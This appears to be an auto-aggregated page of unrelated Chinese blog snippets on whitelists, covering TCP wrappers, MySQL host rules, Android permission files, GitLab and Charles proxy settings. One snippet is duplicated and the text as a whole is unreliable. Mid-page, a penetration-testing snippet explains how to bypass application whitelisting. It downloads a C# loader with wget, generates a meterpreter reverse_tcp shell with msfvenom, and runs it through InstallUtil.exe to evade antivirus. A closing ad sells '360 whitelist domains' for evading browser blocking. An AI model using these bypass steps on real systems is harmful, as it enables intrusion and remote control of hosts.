白名单

安全-TCP_wrapper 使用条件： 记录访问日志 当主机被非法连接的时候，我们可以做到收到一封邮件。 两个配置文件: host.allow host.deny 黑名单： 在/etc/hosts.deny写 白名单： 白名单注意先后顺序,先允许后拒绝 在/etc/hosts.allow写允许局部 在/etc/hosts.deny 写拒绝所有 使用条件： 使用ldd查询对应的命令是否有如下结果,当返回结果时,可以使用 [ root@pam ~ ] # ldd `which vsftpd` | grep libwrap.so libwrap.so.0 = > /lib64/libwrap.so.0 ( 0x00007f6d10fb4000 ) 支持 [ root@pam ~ ] # ldd `which sshd` | grep libwrap.so libwrap.so.0 = > /lib64/libwrap.so.0 ( 0x00007f6f38608000 ) 支持 [ root@pam ~ ] # ldd `which httpd` | grep libwrap.so 不支持 使用man 5 去查看hosts.deny的配置方式 [root@pam ~]# man 5 hosts.deny 例子： ( 1 ) 黑名单 [ root@pam ~ ] # vim /etc

pri-app权限白名单 /system/etc/permissions /product/etc/permissions doze白名单，hidden-api白名单 /system/etc/sysconfig /product/etc/sysconfig 通知渠道，通知设置，通知统计信息（NotificationManagerService管理） /data/system/notification_policy.xml Package信息（PackageManagerService管理，包括权限信息） /data/system/packages.xml Setting信息 /data/system/users/0/settings_global.xml Runtime Permission /data/system/users/0/runtime-permissions.xml RecentTask和图 /data/system_ce/0/recent_tasks /data/system_ce/0/snapshots 来源： CSDN 作者： 笨鸟正飞 链接： https://blog.csdn.net/qq_23129309/article/details/103585495

1 登录mysql mysql -h host -u username -p password 2 切换至mysql库 use mysql; 3 查看当前允许登录IP及用户 select Host,User from user; 4 删除不必要而表中存在的IP和用户 DELETE FROM user WHERE User='username' and Host='host'; (host值为“%”或空表示所有IP都可登录，一般来说此类行需要删掉) 5 增加需要而表中没有的IP和用户 GRANT ALL PRIVILEGES ON *.* TO 'username'@'host' IDENTIFIED BY 'password' WITH GRANT OPTION; 6 使更新的配置生效 FLUSH PRIVILEGES; 说明： 1.语句中的host，username和password根据实际情况进行修改；host为IP或写入hosts文件的主机名，在4和5中还可以是IP段，写法如“192.168.220.0/255.255.255.0”。 2.白名单中限制了可以连接数据库的“IP/用户/密码“组，没在白名单中的无法连接数据库也不能获取获取banner信息，所以可规避扫描器的扫描（漏洞并未真正修复）。 1 登录mysql mysql -h host -u username -p

在内网渗透中，经常会在内网主机执行执行的渗透工具的时候出现执行不起来的情况，很多时候是由与安全软件做了白名单限制，只允许指定的白名单中的应用程序启动，这时我们就需要利用白名单中的程序做我们想做的事情，执行我们想要执行的程序，下面就给大家分享几个绕过白名单执行应用程序的姿势。 一、通过 csharp 编译文件绕过防病毒软件 1、下载 CSharp 文件 wget http://tinyurl.com/InstallUtil-ShellCode-cs 2、使用 msfvenom 生成一个 msf 的 csharp 格式的 shellcode: msfvenom-p windows / meterpreter / reverse_tcp lhost = YOUR_IP lport = 443 -fcsharp> shellcode.txt 3、在 InstallUtil-ShellCode.cs 文件中，您将注意到代码中有两个功能 先从 main 函数的执行命令行中写入显示提示信息，当使用 InstallUtil.exe 工具运行程序时，将执行名为 Uninstall 函数（橙色框中的代码）的中代码的功能。 installUtil.exe 通常位于受信任的应用程序列表中，可能会绕过某些应用程序白名单软件。 Uninstall 函数中的代码将调用 Shellcode 函数

闲来无事购买了 阿里云服务器 准备玩玩，但是使用 xshell 连接阿里云服务器时，系统一直提示“ Connection established. To escape to local shell, press 'Ctrl+Alt+]'. Connection closing...Socket close. Connection closed by foreign host. Disconnected from remote host(ALIYUN) at 15:05:08. Type `help' to learn how to use Xshell prompt. ”（具体如图1所示），百度搜寻无果，最后只能求助阿里云服务人员，特此记录一下解决过程。 ͼ1 首先从网上查到说是需要检查安全组配置，检查ssh的端口号（22）是否开放，但是我已经开放成功了，还是连接不上。端口开放具体可见下图（图2、图3、图4） ͼ2 ͼ3 ͼ4 　　然后网上还有说是需要加IP 白名单，先把IP白名单加起来。IP白名单添加可见附件截图（图5、图6） ͼ5 ͼ6 　　网上查到很多解决方法但是都没有用，最后还是客服人员帮忙解决问题的。原因是我在安装mysql时，误将sshd的群组和用户给修改为mysql导致的，最后只需要将sshd的群组和用户修改为root即可。 可通过 chomd 711 sshd 修改

https://www.hellojava.com/a/76003.html 1）用ip地址字符串hash，显然太low 2）ip地址字符串转换为long，ipv4总共2^32个（4g），一个bit存一个ip地址，4g个bit=0.5g个字节 故建立长度为0.5g的byte数组，接下去要确定的是白ip所在的位置 所在数组索引=ip/8 在byte中位索引=ip%8=ip&(8-1) 来源： https://www.cnblogs.com/silyvin/p/11731987.html

gitlab-ce 7.9安装手札以及上篇文章的问题解决 鸣谢 感谢ruby大神===》章鱼的一路指点，才能拨开迷雾见云天！ 章鱼大人： 国内Ansible部落原创翻译之一！ 资深运维！ ROR大神！ 熟读各种源码，精通十八般运维技能！ 章鱼大人微博： http:// weibo.com/u/2009151365? wvr=5&lf=reg 感谢官方文档！这才是最好的教材 问题描述 每天定时403服务一小时 解决方案 1、修改nginx配置文件，proxy_pass不进行前端访问ip进行后转 【临时解决方案】 2、修改/opt/gitlab/embedded/service/gitlab-rails/config/initializers/1_settings.rb添加白名单 【修改源码的方案】 3、在/etc/gitlab/gitlab.rb中添加白名单 【本文采取方案】 下载 归档页面 https:// about.gitlab.com/downlo ads/archives/ 下载7.9版本 wget https:// downloads-packages.s3.amazonaws.com /ubuntu-14.04/gitlab_7.9.0-omnibus.2-1_amd64.deb 安装指北 参考官网安装： https:// about.gitlab.com/downlo

本文参考： charles 白名单 charles 白名单 白名单工具，允许您阻止除选定位置之外的所有请求。 注意：如果一个请求与“黑名单”和“白名单”同时匹配成功，则会被阻止。 白名单工具 白名单是除了你设置的HOST以外，阻止所有请求。 当Charles收到与白名单不匹配的请求时，Charles会阻止该请求。 您可以选择Charles是否会简单地关闭浏览器的连接，或者向浏览器返回错误页面（具有403响应）。 黑名单工具，用于仅屏蔽选定的域名。 如果一个请求与“黑名单”和“白名单”都匹配，则会被阻止。 本文参考: https://www.axihe.com/ 来源： https://www.cnblogs.com/broszhu/p/11556242.html

闲来无事购买了 阿里云服务器 准备玩玩，但是使用 xshell 连接阿里云服务器时，系统一直提示“ Connection established. To escape to local shell, press 'Ctrl+Alt+]'. Connection closing...Socket close. Connection closed by foreign host. Disconnected from remote host(ALIYUN) at 15:05:08. Type `help' to learn how to use Xshell prompt. ”（具体如图1所示），百度搜寻无果，最后只能求助阿里云服务人员，特此记录一下解决过程。 图1 首先从网上查到说是需要检查安全组配置，检查ssh的端口号（22）是否开放，但是我已经开放成功了，还是连接不上。端口开放具体可见下图（图2、图3、图4） 图2 图3 图4 　　然后网上还有说是需要加IP 白名单，先把IP白名单加起来。IP白名单添加可见附件截图（图5、图6） 图5 图6 　　网上查到很多解决方法但是都没有用，最后还是客服人员帮忙解决问题的。原因是我在安装mysql时，误将sshd的群组和用户给修改为mysql导致的，最后只需要将sshd的群组和用户修改为root即可。 可通过 chomd 711 sshd 修改

360白名单域名是一种经过了360安全机制所认可的域名，在360浏览器中具有非常好的防封效果。因为他的特殊的防封效果，受到了广大站长的欢迎。因为不会轻易被封，所以站长们做的优化排名的工作就不会白白被浪费掉。 360白名单域名是经过内部认可的域名，可以使用很久效果也是非常明显，所以价格比普通备案域名要高些。但是相对于他的能带来的效益来说，是性价比非常高的。 网站页面需要上360的可以试下这个360白名单域名。良心推荐！ 来源： https://blog.csdn.net/qq170807668/article/details/99056424